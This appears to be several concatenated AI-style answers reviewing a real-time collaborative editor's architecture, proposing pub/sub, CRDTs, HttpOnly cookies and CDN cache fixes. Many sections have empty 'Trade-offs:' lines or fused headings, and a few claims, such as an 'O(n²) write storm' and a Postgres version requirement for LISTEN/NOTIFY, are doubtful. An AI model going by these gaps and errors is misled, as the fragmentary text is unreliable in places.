await batchWriteToPostgres(Array.from(changeBuffer.values()));
changeBuffer.clear();
}
}, 1000); // Batch every second
Trade-offs:
Problem: 5-minute CDN cache on API responses causes stale data.
Solution: Implement cache invalidation strategy
// Use surrogate keys for fine-grained invalidation
res.set('Surrogate-Key', `doc-${docId} org-${orgId}`);
// Invalidate on updates
await fetch(`https://api.cloudfront.com/invalidate`, {
method: 'POST',
body: JSON.stringify({ paths: [`/api/documents/${docId}`] })
});
Trade-offs:
Problem: Users lose changes when WebSocket disconnects.
Solution: Implement offline queue with exponential backoff
class OfflineQueue {
constructor() {
this.queue = [];
this.backupInterval = setInterval(() => this.backupToLocal(), 5000);
}
enqueue(change) {
this.queue.push(change);
localStorage.setItem('offline-queue', JSON.stringify(this.queue));
}
}
Trade-offs:
Problem: In-flight writes lost on server crash.
Solution: Implement write-ahead log
// Write to WAL before processing
await redis.lpush(`wal:${docId}`, JSON.stringify({
id: uuid(),
operation: operation,
timestamp: Date.now()
}));
// Process from WAL on startup
const wal = await redis.lrange(`wal:${docId}`, 0, -1);
Trade-offs:
Problem: Full HTML snapshots become expensive for large documents.
Solution: Implement chunked storage with CRDTs
// Store document as chunks
const CHUNK_SIZE = 1000; // characters
class ChunkedDocument {
chunks = new Map();
insert(text, position) {
const chunkIndex = Math.floor(position / CHUNK_SIZE);
this.chunks.get(chunkIndex).insert(text, position % CHUNK_SIZE);
}
}
Trade-offs:
// Implement a hybrid approach
const EnhancedArchitecture = {
// Use CRDTs for conflict-free collaboration
syncStrategy: 'CRDT_with_vector_clocks',
// Event sourcing for audit trail
storage: 'event_sourcing_with_snapshots',
// Redis Streams for reliable message delivery
realTime: 'redis_streams_with_consumer_groups',
// Implement circuit breakers
resilience: 'circuit_breaker_with_fallback',
// Use consistent hashing for document distribution
scaling: 'consistent_hashing_by_document_id'
};
This comprehensive approach addresses the most critical issues first while building toward a more robust, scalable architecture.
Here are the critical issues in this architecture, categorized by type:
1. Client Clock Synchronization in Last-Write-Wins
2. Race Between Broadcast and Persistence
3. Read Replica Lag Stale Data
4. PostgreSQL Polling Thundering Herd
document_id. Servers use consumer groups to subscribe only to documents their clients are actively editing.5. Per-Change PostgreSQL Writes
fsync=everysec and replication factor of 3. Reduces PostgreSQL write load by 95%.6. Full HTML Snapshot Storage
7. CDN API Response Caching
Cache-Control: private, no-cache, max-age=0 for all document API endpoints. Use CDN only for static assets (JS, CSS). For performance, implement Edge-side rendering with 1-second TTL and surrogate key purging on updates.8. WebSocket Server Crash
client_id, document_id, last_acknowledged_op) in Redis with TTL. On reconnection, clients resume from last_acknowledged_op. Use Redis Streams consumer groups to allow other servers to take over disconnected clients' subscriptions.9. Message Broker Partition
10. Database Connection Exhaustion
11. JWT in localStorage (XSS Risk)
12. No Rate Limiting on WebSocket Messages
13. Load Balancer WebSocket Stickiness
client_id in query param for better distribution.| Component | Current | Recommended | Impact |
|---|---|---|---|
| Sync Strategy | Client timestamps + LWW | CRDTs (Yjs) + HLC | Fixes data loss, enables offline editing |
| Cross-server comms | PostgreSQL polling (2s) | Redis Streams | Real-time sync, 95% DB load reduction |
| Storage | Full HTML snapshots | Operations log + snapshots | 95% storage savings, enables undo/redo |
| Auth | JWT in localStorage | httpOnly cookies + rotation | Mitigates XSS, enables revocation |
| CDN | API cached 5min | API no-cache, assets cached | Fixes stale data, increases origin load |
| Persistence | Per-change writes | Batch async writes (500ms) | 95% write load reduction |
| Session State | Server memory | Redis with TTL | Enables failover, adds 5ms latency |
The architecture requires significant changes to be production-ready, particularly replacing the synchronization strategy and message bus. The trade-offs consistently favor complexity and latency over data loss and inconsistency, which is the correct priority for a collaborative editor.
This architecture contains several critical flaws that would prevent real-time collaboration, create data consistency issues, and cause catastrophic failures at scale. Here are the specific problems and solutions:
Problem: With round-robin load balancing and server-isolated WebSocket broadcasts, users connected to different API servers won't see each other's changes in real-time. Server A broadcasts only to its clients, while Server B discovers changes by polling PostgreSQL every 2 seconds.
Race Condition: User A (Server 1) and User B (Server 2) edit simultaneously. User A sees their change immediately; User B sees it 2 seconds later. During that window, User B edits stale content, creating a conflict that appears as a "jump" when the merge happens.
Solution: Implement Redis Pub/Sub (or NATS/RabbitMQ) as a message bus between API servers.
doc:{id}:changesTrade-offs:
Problem: Using client timestamps for "last-write-wins" is unreliable. If User A's laptop clock is 5 minutes fast (common with manual time changes or NTP failures), their edits permanently overwrite User B's concurrent edits, even if B typed later.
Race Condition:
T+0: User B (correct time) edits paragraph
T+1: User A (clock +5min) edits same paragraph
T+2: Server receives B's edit (timestamp later than A's local time)
T+3: A's edit "wins" despite being chronologically second
Solution: Implement Hybrid Logical Clocks (HLC) or server-assigned monotonic sequence numbers.
version = max(server_timestamp, client_timestamp) + 1Trade-offs:
Problem: Writing every keystroke to PostgreSQL creates an O(n²) write storm. With 1000 concurrent users typing 3 chars/second = 3000 writes/sec, plus read replicas lagging, causing replication delay.
Failure Mode: During traffic spikes, PostgreSQL connection pool exhaustion causes cascading failures. The 2-second polling from N servers creates N/2 queries per second per document.
Solution: Implement Event Sourcing with Kafka + In-Memory CRDT State.
Trade-offs:
Problem: CloudFront caching API responses for 5 minutes means:
Solution: Disable caching for all /api/* and /ws/* routes. Use CDN only for static assets (React bundle, CSS, images). Implement separate domains: static.example.com (CDN) vs api.example.com (no cache).
Trade-offs:
Problem: Storing JWT in localStorage makes it vulnerable to XSS attacks. A malicious script can steal the token and impersonate the user for 24 hours.
Solution: Use HttpOnly, Secure, SameSite=Strict cookies for the session ID.
Trade-offs:
/refresh endpointProblem: Round-robin load balancing without sticky sessions means:
Solution: Implement IP Hash or Cookie-based sticky sessions on the load balancer.
Trade-offs:
Problem: Full HTML snapshots every 30 seconds create:
Solution: Store operation logs (deltas) not snapshots.
Trade-offs:
Problem: If Server 1 crashes after writing to PostgreSQL but before broadcasting via Redis Pub/Sub, the edit is persisted but never reaches other users. They continue editing an old version, creating a "fork" in the document history.
Solution: Implement Server-Sent Events (SSE) for critical updates + Vector Clocks for version tracking.
last_seen_version to serverTrade-offs:
Problem: As you add more API servers, the 2-second polling interval creates a thundering herd on PostgreSQL. With 100 servers polling 1000 active documents: 100 × 1000 / 2 = 50,000 queries/second just for polling.
Solution: Reverse the polling direction. Use Redis Keyspace Notifications or PostgreSQL LISTEN/NOTIFY (if using Postgres 14+ with logical replication).
doc:{id}:notifySUBSCRIBE instead of pollingTrade-offs:
Problem: "Last-write-wins at paragraph level" provides terrible UX. If two users type in the same paragraph simultaneously, one user's entire edit disappears.
Solution: Integrate Yjs or Automerge protocol.
Trade-offs:
| Priority | Fix | Impact |
|---|---|---|
| P0 | Replace polling with Redis Pub/Sub | Enables real-time collaboration |
| P0 | Remove CDN caching on API | Prevents data corruption |
| P0 | Move JWT to HttpOnly cookies | Security compliance |
| P1 | Implement CRDTs (Yjs) | Correct conflict resolution |
| P1 | Buffer writes in Redis, batch to Postgres | Supports >10k concurrent users |
| P2 | Add sticky sessions | Prevents reconnection storms |
Without these changes, the system will fail under load of ~100 concurrent users due to database contention and will provide a broken collaboration experience (2-second delays, lost edits).
Potential Failure Modes:
Single Point of Failure (SPOF) in Load Balancer: If the load balancer fails, all incoming traffic will be lost. Solution: Use multiple load balancers in a high-availability configuration, such as a master-slave setup with automatic failover. Trade-off: Additional complexity and cost.
Database Connection Pool Exhaustion: If too many API servers connect to the database simultaneously, the connection pool may become exhausted. Solution: Implement a connection pooling mechanism that can scale with the number of API servers, or consider using a message queue to handle updates. Trade-off: Additional complexity and potential performance impact.
Client-Side WebSocket Connection Failure: If a client's WebSocket connection is lost, they may not receive updates or be able to send changes. Solution: Implement automatic reconnection with exponential backoff, and consider using a message queue to handle updates. Trade-off: Additional complexity and potential performance impact.
Server-Side WebSocket Connection Failure: If an API server's WebSocket connections are lost, clients will not receive updates or be able to send changes. Solution: Implement automatic reconnection with exponential backoff, and consider using a message queue to handle updates. Trade-off: Additional complexity and potential performance impact.
Auth Token Expiration: If a user's auth token expires, they will be logged out and unable to access the document. Solution: Implement automatic token renewal or consider using a longer-lived token. Trade-off: Potential security risks if tokens are not properly secured.
CDN Cache Invalidation: If the CDN cache is not properly invalidated, users may see stale data. Solution: Implement a cache invalidation mechanism that updates the CDN cache when data changes. Trade-off: Additional complexity and potential performance impact.
Race Conditions:
Last-Write-Wins Conflict Resolution: If two users edit the same paragraph simultaneously, the last write may win, potentially causing data loss for the first user. Solution: Implement a more sophisticated conflict resolution mechanism, such as operational transformation or multi-version concurrency control. Trade-off: Additional complexity and potential performance impact.
Database Update Race Conditions: If multiple API servers update the database simultaneously, race conditions may occur. Solution: Implement a locking mechanism or consider using a message queue to handle updates. Trade-off: Additional complexity and potential performance impact.
Scaling Bottlenecks:
Database Write Bottleneck: As the number of users increases, the database may become a bottleneck due to high write traffic. Solution: Implement a sharding mechanism to distribute write traffic across multiple databases. Trade-off: Additional complexity and potential data consistency issues.
API Server WebSocket Connection Bottleneck: As the number of users increases, API servers may become bottlenecked due to high WebSocket connection traffic. Solution: Implement a connection pooling mechanism or consider using a message queue to handle updates. Trade-off: Additional complexity and potential performance impact.
CDN Cache Hit Bottleneck: As the number of users increases, the CDN cache may become bottlenecked due to high traffic. Solution: Implement a caching mechanism that can scale with traffic, or consider using a content delivery network with built-in caching. Trade-off: Additional complexity and potential performance impact.
Redis Session Cache Bottleneck: As the number of users increases, the Redis session cache may become bottlenecked due to high traffic. Solution: Implement a sharding mechanism to distribute session cache traffic across multiple Redis instances. Trade-off: Additional complexity and potential data consistency issues.
Additional Suggestions:
Each proposed solution comes with its trade-offs, requiring careful consideration of the specific needs and constraints of the collaborative document editor.
Potential Failure Modes, Race Conditions, and Scaling Bottlenecks:
By addressing these potential failure modes, race conditions, and scaling bottlenecks, you can improve the reliability, performance, and scalability of your real-time collaborative document editor.
Below is a systematic review of the described real‑time collaborative editor.
For each problem I list:
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| Clock drift – client timestamps are used for LWW. | Two users editing the same paragraph can produce nondeterministic ordering; the “last” edit may not reflect real intent. | • Use server‑generated logical timestamps (e.g., Lamport clocks or a monotonically increasing counter per document). <br>• Store the server‑generated timestamp in the change payload. | Requires a tiny round‑trip (or embed the timestamp in the WebSocket message) but eliminates reliance on client clocks. |
| LocalStorage token persistence – vulnerable to XSS and can be cleared by the user. | Unexpected logout, loss of session state, possible replay attacks. | • Move JWT to an HttpOnly secure cookie (same‑site). <br>• Refresh token flow (short‑lived access token + long‑lived refresh token). | Adds an extra token and refresh endpoint, but improves security and resilience to token loss. |
| WebSocket reconnection handling – not described. | Users may lose the connection and see stale data or duplicate edits. | • Implement exponential back‑off reconnection with state sync on reconnect (e.g., request the latest document snapshot). | Slightly more client code, but essential for reliability. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| Single‑point WebSocket “owner” per server – each server only broadcasts to its own connections. | Changes made on one server are not instantly visible to clients on other servers. | • Use a publish‑subscribe system (Redis Pub/Sub, NATS, or Kafka) to fan‑out changes across all servers. <br>• On change receipt, publish to a channel; all servers subscribe and push to their local sockets. | Adds a small latency (publish‑subscribe round‑trip) but removes the need for polling. |
| Polling PostgreSQL every 2 s – inefficient and noisy. | High read load on the primary (or a replica), increased latency for cross‑server sync, potential missed changes if a change occurs just after a poll. | • Replace polling with a change‑data‑capture (CDC) mechanism (e.g., PostgreSQL logical replication, Debezium). <br>• Or use a lightweight “last‑updated” timestamp column and a LISTEN/NOTIFY on change. | Requires extra infrastructure (CDC pipeline) or a small DB change, but eliminates polling overhead and guarantees immediate propagation. |
| Last‑write‑wins (LWW) with timestamps – naïve conflict resolution. | Simultaneous edits to the same paragraph can overwrite each other, losing user intent. | • Adopt Operational Transformation (OT) or Conflict‑free Replicated Data Types (CRDTs) for the document model. <br>• If full OT/CRDT is too heavy, use a hybrid: LWW for non‑conflicting regions, and a “merge‑by‑paragraph” algorithm that preserves both edits (e.g., split the paragraph). | OT/CRDT adds complexity and overhead per edit; a hybrid approach is easier to implement but still requires careful design. |
| Document snapshot every 30 s – large writes. | Frequent full‑HTML writes can cause write amplification and slow down the DB. | • Store incremental deltas (diffs) instead of full snapshots. <br>• Keep a background job that composes deltas into a full snapshot every N minutes. | Adds delta‑storage logic but reduces write volume. |
| JWT verification on every request – stateless but may be heavy under load. | CPU overhead per request, especially if the secret is large or RSA verification is used. | • Cache the public key and use a fast symmetric algorithm (HS256) with a short TTL. <br>• Or use token introspection with Redis to avoid verification on each request. | Symmetric keys are faster but less secure if compromised; introspection adds a Redis lookup. |
| Static assets cached by CloudFront for 5 min – may serve stale data after a deployment. | Users may see old JS/CSS after a bug fix. | • Use versioned URLs (e.g., app.v1.2.3.js) or set Cache-Control: max-age=0, must-revalidate for critical assets. | Versioned URLs increase storage but guarantee freshness. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| Single write node for all changes – no sharding. | Write bottleneck as the number of concurrent edits grows; potential lock contention on the same document row. | • Partition documents by organization ID (as planned) and use a sharded Postgres cluster or a document‑oriented store (e.g., CockroachDB) that scales horizontally. <br>• Use row‑level locking only when necessary; otherwise rely on optimistic concurrency (version column). | Sharding adds operational complexity; CockroachDB introduces a different query model. |
| Read replicas for read‑heavy ops – not used for change propagation. | Polling still hits the primary; read replicas are underutilized. | • Route all read‑only queries (e.g., fetching the latest snapshot) to replicas. <br>• Ensure replicas are up‑to‑date for CDC or LISTEN/NOTIFY. | Replicas may lag slightly; need to monitor replication lag. |
| Storing full HTML snapshots – large blobs. | Increased storage cost, slower backup, harder to diff. | • Store as plain text with compression (e.g., GZIP) or use a binary format (e.g., Protobuf) for deltas. | Compression adds CPU overhead; binary format may require extra tooling. |
| No explicit durability guarantee for edits – writes may be lost if server crashes before DB commit. | Users may lose recent changes. | • Use a write‑ahead log (WAL) and ensure synchronous_commit = on for critical tables. <br>• Or buffer edits in Redis with a short TTL and replay on crash. | synchronous_commit can slow writes; Redis buffering adds complexity. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| Session cache only – no use for change propagation. | No benefit from Redis’s pub/sub capabilities. | • Use Redis Pub/Sub (or Streams) for cross‑server change broadcast, as mentioned above. | Requires Redis to be highly available (clustered). |
| Potential data loss on Redis eviction – default LRU may evict session data. | Users get logged out unexpectedly. | • Set a higher maxmemory-policy (e.g., allkeys-lru) and increase memory, or use Redis persistence (RDB/AOF) for critical sessions. | More memory cost; persistence adds write overhead. |
| No rate‑limiting – clients could flood the server with change events. | Server overload, increased latency. | • Implement per‑client rate limiting in the API layer (e.g., token bucket) or use a CDN edge rule. | Adds a small check per request; may need to tune thresholds. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| Round‑robin routing – does not respect session affinity. | A client may reconnect to a different server after a temporary loss, causing duplicate change handling or missed updates. | • Use sticky sessions (session cookie) or a consistent hashing scheme based on document ID. | Sticky sessions can reduce pool utilization; consistent hashing requires a custom load‑balancer or service mesh. |
| No health‑check for WebSocket connections – dead servers may still receive client traffic. | Clients may experience dropped connections and need reconnection logic. | • Enable WebSocket‑aware health checks (e.g., ping/pong) and remove unhealthy nodes from rotation. | Slightly more configuration but improves reliability. |
| Scaling of WebSocket memory – each server holds all its connections. | Memory pressure when many users connect to a single server. | • Distribute connections evenly (via sticky routing) and consider a dedicated WebSocket gateway (e.g., NGINX + uWSGI) that can scale independently. | Adds an extra service layer. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| Last‑write‑wins – no context of edit intent. | Users may lose meaningful changes, especially in collaborative editing. | • Implement OT/CRDT for fine‑grained merge. <br>• If full OT/CRDT is too heavy, adopt a “paragraph‑level merge” that splits the paragraph and preserves both edits. | OT/CRDT requires a more complex client library; paragraph merge is simpler but may still conflict on overlapping edits. |
| Timestamp collisions – two edits with identical timestamps (e.g., same millisecond). | Deterministic ordering not guaranteed. | • Append a server‑generated unique sequence number to the timestamp. | Slightly more data per edit. |
| No versioning – changes can be applied out of order. | Inconsistent document state across clients. | • Include a monotonically increasing document version in each change; servers reject out‑of‑order changes. | Requires client to fetch the latest version before editing, adding latency. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| JWT stored in localStorage – vulnerable to XSS. | Token theft, session hijacking. | • Move to HttpOnly secure cookie (as above). | Adds CSRF protection considerations (e.g., double‑submit cookie). |
| No per‑document permission checks – any authenticated user can edit any document. | Data leakage. | • Store ACLs in the DB and verify on each change request. | Slightly more DB reads per edit. |
| No rate limiting on API – potential abuse. | Server overload, denial‑of‑service. | • Implement global and per‑document rate limits (e.g., using Redis counters). | Adds a Redis dependency. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| No metrics on change propagation latency – cannot detect slow servers. | Hidden performance regressions. | • Instrument WebSocket send/receive timestamps and publish to a monitoring system (Prometheus). | Extra code, but essential for SLA. |
| No tracing of cross‑server broadcasts – hard to debug missed updates. | Users see stale content. | • Add distributed tracing (e.g., OpenTelemetry) around publish/subscribe and DB writes. | Adds overhead and requires a tracing backend. |
| No alerting on replication lag – CDC may fall behind. | Clients may see outdated snapshots. | • Monitor pg_stat_replication lag and set alerts. | Requires monitoring stack. |
| Layer | Primary Change | Key Benefit |
|---|---|---|
| Client | Server‑generated timestamps, HttpOnly cookie, reconnection sync | Removes clock drift, improves security, ensures state consistency |
| WebSocket Broadcast | Use Redis Pub/Sub or NATS instead of polling | Real‑time cross‑server propagation, eliminates 2‑second polling latency |
| Conflict Resolution | Adopt OT/CRDT or hybrid paragraph merge | Guarantees intent preservation, reduces lost edits |
| Data Storage | Store incremental deltas + periodic full snapshots | Reduces write volume, improves backup efficiency |
| Database | Partition by org, use CDC or LISTEN/NOTIFY, enable synchronous_commit for critical edits | Scales writes, ensures durability, removes polling |
| Load Balancing | Sticky sessions or consistent hashing, WebSocket‑aware health checks | Keeps client on same server, prevents dead connections |
| Security | HttpOnly cookie, per‑document ACLs, rate limiting | Mitigates XSS, data leakage, abuse |
| Observability | Metrics, tracing, replication lag alerts | Enables rapid detection of performance or consistency issues |
| Enhancement | Cost / Complexity | New Failure Modes | Mitigation |
|---|---|---|---|
| Redis Pub/Sub | Requires Redis cluster, handle message loss if a server crashes. | Use at‑least‑once delivery and deduplication logic on the client. | |
| OT/CRDT | Significant client & server library effort; higher per‑edit CPU. | Start with a simple OT implementation for text only; fallback to LWW for non‑conflicting ops. | |
| Delta storage | Need diffing logic, more complex snapshot assembly. | Cache recent deltas in memory for quick reconstruction; validate snapshots periodically. | |
| Sticky sessions | Can lead to uneven load distribution. | Combine with session‑id hashing that balances across nodes. | |
| HttpOnly cookie | Requires CSRF protection (e.g., double‑submit cookie). | Add CSRF token verification on state‑changing endpoints. |
Implementing the above changes will transform the system from a polling‑heavy, clock‑driven, LWW‑only design into a robust, low‑latency, conflict‑aware collaborative editor that scales horizontally without sacrificing consistency or security.
Below is a structured “failure‑mode → mitigation” map for the architecture you described.
For each problem I note the symptom / risk, the root cause, a concrete remediation, and the key trade‑offs you’ll have to weigh when you implement it.
| # | Failure / Race Condition | Why it happens | Concrete solution | Trade‑offs |
|---|---|---|---|---|
| 1.1 | Lost updates when a server crashes – a client’s WebSocket is attached to a single API instance; if that instance dies the change never reaches other clients. | No central fan‑out; each server only knows about its own connections. | • Introduce a message broker (Kafka, NATS, or Redis Pub/Sub) that all API nodes publish changes to. <br>• Each server subscribes to the broker and pushes to all its local sockets. | Broker adds latency (few ms) and operational overhead, but guarantees at‑least‑once delivery and decouples scaling of WS workers from the DB. |
| 1.2 | Sticky‑session requirement – load‑balancer round‑robin can route a client’s subsequent WS frames to a different server, breaking the “only broadcast to own sockets” rule. | WS connections are stateful; a client can have only one active socket. | • Use session affinity (sticky‑sessions) on the LB or <br>• Deploy a WebSocket gateway (e.g., Envoy, NGINX, or a dedicated socket‑server) that terminates WS and forwards events to the broker. | Sticky‑sessions limit true horizontal scaling of WS workers; a gateway adds a hop but lets you scale workers independently. |
| 1.3 | Back‑pressure / overload – a burst of edits (e.g., paste of a large block) floods the broker and downstream sockets, causing queue buildup and eventual OOM. | No flow‑control; WS frames are fire‑and‑forget. | • Rate‑limit at the client (debounce typing, max N ops / sec). <br>• Batch changes on the server (e.g., 10 ms windows) before publishing. <br>• Enable broker back‑pressure (Kafka’s consumer lag metrics) and drop or throttle when lag exceeds a threshold. | Slight increase in latency (few tens of ms) but protects stability. |
| 1.4 | Network partition / intermittent connectivity – a client temporarily loses WS, reconnects to a different server, and misses intermediate ops. | No replay mechanism; server only pushes live updates. | • Store ops in a log (Kafka topic or Redis stream) with a monotonically increasing sequence number. <br>• On reconnect, the client asks for “ops after seq X”. | Requires client‑side sequence tracking and log retention; extra storage cost. |
| 1.5 | Duplicate delivery – if a server publishes to the broker and also re‑broadcasts locally, a client connected to the same server may receive the same op twice. | Lack of idempotency handling. | • Include a unique op‑ID (UUID + server‑id) and have the client dedupe. <br>• Or let the broker be the only broadcast path (remove local broadcast). | Slight client complexity; eliminates double‑send risk. |
| # | Failure / Race Condition | Why it happens | Concrete solution | Trade‑offs |
|---|---|---|---|---|
| 2.1 | Write‑write conflict & last‑write‑wins (LWW) is unreliable – client clocks drift, leading to “future” timestamps that overwrite newer edits. | No authoritative time source. | • Use server‑side timestamps (e.g., NOW() in Postgres) instead of client‑provided ones. <br>• Or keep client‑provided timestamps but validate they are within a sane bound (e.g., ±5 s). | Server timestamps guarantee total order, but you lose the ability to resolve ties based on client intent (e.g., “my edit happened earlier”). |
| 2.2 | Polling lag – other servers poll every 2 s, causing up to 2 s of stale view and increasing conflict probability. | Polling is coarse and adds DB load. | • Replace polling with change‑data‑capture (CDC) (Postgres logical replication) that streams changes to the broker. <br>• Or use LISTEN/NOTIFY + a lightweight pub/sub to push updates instantly. | CDC requires extra infrastructure (Debezium, Kafka Connect); LISTEN/NOTIFY has limited payload size and can be overwhelmed at high QPS. |
| 2.3 | Snapshot loss – full HTML snapshots every 30 s means any crash between snapshots loses up to 30 s of work. | No incremental persistence. | • Persist incremental ops (the same stream used for real‑time) to durable storage (Kafka, S3). <br>• Periodically compact into a new snapshot (e.g., every minute). | More storage I/O but near‑zero data loss; compaction adds CPU overhead. |
| 2.4 | Read‑replica lag – heavy read traffic (e.g., document load) can cause replicas to lag behind the primary, showing stale data after a write. | Replication is asynchronous. | • Serve writes (including the latest state) from the primary only; route read‑only heavy ops (history, analytics) to replicas. <br>• Use synchronous replication for critical tables (costly). | Synchronous replication hurts write latency; routing logic adds complexity. |
| 2.5 | Hot‑spot partitions – documents are partitioned by organization ID, but a large org can generate a disproportionate load on a single DB shard. | Uneven distribution of active docs. | • Add sharding on document ID (hash) in addition to org ID, or use Citus (Postgres distributed) to auto‑balance. | Requires schema changes and a distributed query layer. |
| 2.6 | Dead‑locks / transaction contention – many concurrent edits on the same row (document) cause lock contention. | Each edit writes a new row or updates a large JSON column. | • Use append‑only table for ops (no UPDATE). <br>• Or store the document in a document‑store (e.g., MongoDB) that handles concurrent writes better. | Append‑only table grows quickly; need periodic compaction. |
| # | Failure / Race Condition | Why it happens | Concrete solution | Trade‑offs |
|---|---|---|---|---|
| 3.1 | Cache stampede on document load – many clients request the same doc after a snapshot, all hit the DB simultaneously. | No request coalescing. | • Use single‑flight / request coalescing (e.g., SETNX lock) so only one DB fetch occurs; others wait for the cached result. | Slight latency for waiting clients; extra lock handling. |
| 3.2 | Redis node failure – session cache lost, causing auth look‑ups to fall back to DB and increasing latency. | No redundancy. | • Deploy Redis Cluster with replication and automatic failover (e.g., via Sentinel). | Higher memory cost; need to handle key‑slot migrations. |
| 3.3 | Stale session data – JWT stored in localStorage, but Redis is used for revocation; if Redis is out‑of‑sync, revoked tokens may still be accepted. | No real‑time sync between client and Redis. | • Use short‑lived JWTs (e.g., 15 min) + refresh tokens stored in Redis. <br>• Or keep JWTs stateless and rely on token introspection only when a revocation flag is set. | Shorter JWT lifespan increases refresh traffic; adds complexity to token flow. |
| # | Failure / Race Condition | Why it happens | Concrete solution | Trade‑offs |
|---|---|---|---|---|
| 4.1 | JWT replay after logout – token lives 24 h; if a user logs out on one device, the token remains valid elsewhere. | No revocation list. | • Store a token version or session ID in Redis; on logout increment version, forcing clients to fetch a new token. <br>• Or reduce JWT TTL to 1 h and use refresh tokens. | More frequent token refresh; extra Redis reads on each request. |
| 4.2 | XSS stealing of JWT from localStorage – localStorage is accessible to any script on the page. | Insecure storage. | • Move token to httpOnly Secure SameSite cookies. <br>• Or keep in IndexedDB with CSP + Subresource Integrity. | Cookies are sent automatically on every request (including static assets) unless scoped; need careful SameSite handling. |
| 4.3 | Clock skew in token issuance – client clock used for “exp” validation can be wrong, causing premature rejection. | Client‑side time check. | • Validate exp on the server only; client should ignore it for UI decisions. | Slight UX impact (user may see “session expired” after a few minutes). |
| # | Failure / Race Condition | Why it happens | Concrete solution | Trade‑offs |
|---|---|---|---|---|
| 5.1 | Stale API responses – CloudFront caches API GETs for 5 min, so a client may read an outdated document snapshot after an edit. | Cache TTL too aggressive for mutable data. | • Set Cache‑Control: no‑store or max‑age=0 for document‑fetch endpoints. <br>• Or use Cache‑Tag invalidation on each edit (purge specific doc). | More origin traffic; invalidation adds latency but guarantees freshness. |
| 5.2 | Cache warm‑up latency – after a new document is created, the first read triggers a cache miss and a DB hit, causing a spike. | No pre‑warming. | • Proactively populate CDN (or edge cache) after snapshot creation via a background job. | Extra write‑through cost; minimal impact if done asynchronously. |
| # | Failure / Race Condition | Why it happens | Concrete solution | Trade‑offs |
|---|---|---|---|---|
| 6.1 | Unbalanced load – round‑robin without health checks can send traffic to a crashed instance, causing connection failures. | LB not aware of instance health. | • Enable health‑check endpoints (e.g., /healthz) and configure LB to skip unhealthy nodes. | Slightly longer health‑check interval may delay detection. |
| 6.2 | Graceful shutdown – when a server is terminated (e.g., autoscaling), existing WS connections are dropped abruptly. | No draining. | • Implement connection draining: stop accepting new WS, broadcast a “reconnect” message, wait for existing sockets to close, then exit. | Slightly longer termination time; need orchestrator support (K8s pod termination hooks). |
| Bottleneck | Symptoms | Remedy | Trade‑offs |
|---|---|---|---|
| WebSocket fan‑out | Each server only knows its own sockets → limited to per‑node client count. | Central broker (Kafka/NATS) + pub/sub; or a dedicated WS gateway. | Adds a network hop and operational component, but enables true horizontal scaling of API nodes. |
| DB write throughput | All edits go to a single PostgreSQL primary → CPU/IO saturation. | Append‑only ops table + partitioning (by org + hash) or move to a distributed SQL (Citus, CockroachDB). | More complex schema; need compaction jobs. |
| Polling latency | 2 s poll → stale view, higher conflict rate. | CDC / LISTEN‑NOTIFY to push changes instantly. | CDC adds extra services; LISTEN‑NOTIFY limited payload size. |
| Snapshot frequency | 30 s snapshots → potential loss of up to 30 s of work. | Persist incremental ops to durable log; compact into snapshots periodically. | Extra storage I/O; compaction CPU cost. |
| Redis single point | One Redis node → cache miss + session loss on failure. | Redis Cluster with replicas + Sentinel. | Higher memory cost; need to handle key‑slot migrations. |
| JWT long TTL | Revocation impossible, XSS risk. | Shorter JWT + refresh token; store revocation list in Redis. | More token refresh traffic; extra Redis reads. |
| CDN stale API | 5 min cache TTL → stale document reads. | Cache‑Control: no‑store for mutable endpoints; edge invalidation on edit. | More origin load; but guarantees freshness. |
| Load‑balancer routing | Round‑robin without affinity breaks WS continuity. | Sticky sessions or WS gateway that terminates connections. | Sticky sessions limit true stateless scaling; gateway adds a hop. |
If you need to ship a more robust version quickly, focus on the high‑impact, low‑complexity changes first:
NOW() and store a monotonic sequence number.doc:{id}. Replace the per‑node broadcast with a subscription to that channel.LISTEN/NOTIFY on the ops table and have each API node push the notification to the broker, eliminating the 2 s poll.Cache‑Control: no‑store on all document‑fetch endpoints; invalidate CDN on every edit (CloudFront invalidation API)./healthz and configure LB draining.These steps give you real‑time consistency, no stale reads, and basic fault tolerance while keeping the architecture simple.
| Enhancement | What it solves | Rough effort |
|---|---|---|
| CRDT / Operational Transformation (OT) | Eliminates LWW conflicts, enables true concurrent editing without a central arbiter. | High – requires a new data model, client library, and server‑side merging. |
| Event‑sourced document store (Kafka + compacted topic) | Guarantees lossless edit history, fast replay for new nodes, and easy snapshotting. | Medium – need to build consumer pipelines and compaction logic. |
| Distributed SQL (Citus / CockroachDB) | Scales writes horizontally, removes hot‑spot partitions. | Medium – data migration and query‑rewriting. |
| WebSocket gateway (Envoy/Traefik) | Decouples WS scaling from API logic, removes sticky‑session requirement. | Low‑Medium – configuration only, but requires a new service. |
| Token introspection service | Central revocation, short‑lived JWTs, per‑device logout. | Low – small microservice + Redis. |
| Edge‑computing (Cloudflare Workers) | Move diff‑generation to edge, reduce origin load. | Medium – custom JavaScript/TypeScript on edge. |
Implement the low‑effort fixes first, then progressively adopt the higher‑complexity, higher‑value solutions (CRDT/OT, event‑sourcing, distributed SQL) as the product scales.
Issue: Last-write-wins with client timestamps is fundamentally flawed
Solution: Implement operational transformation (OT) or Conflict-Free Replicated Data Types (CRDTs)
Issue: Each server only broadcasts to its own clients
Solution: Implement a pub/sub layer (Redis Pub/Sub or Kafka)
Client → Server → Pub/Sub Channel → All Servers → All Clients
Issue: Server crash or network partition loses up to 30 seconds of work
Solution: Write-ahead log (WAL) + more frequent incremental saves
Issue: JWT in localStorage vulnerable to XSS attacks
Solution:
Issue: All writes go to single PostgreSQL primary
Solution:
Issue: CloudFront caching API responses for 5 minutes
Solution:
Issue: Server crash disconnects all its clients
Solution:
Issue: Document partitioning by organization ID creates hotspots
Solution:
Issue: No strategy for network partitions (CAP theorem)
Solution:
Issue: No mention of metrics, logging, or tracing
Solution:
| Solution | Complexity | Performance | Consistency | Cost |
|---|---|---|---|---|
| OT/CRDT | High | Medium | Strong | Medium |
| Pub/Sub | Medium | Good | Eventual | Low |
| CQRS | High | Excellent | Eventual | High |
| CDC | Medium | Excellent | Eventual | Medium |
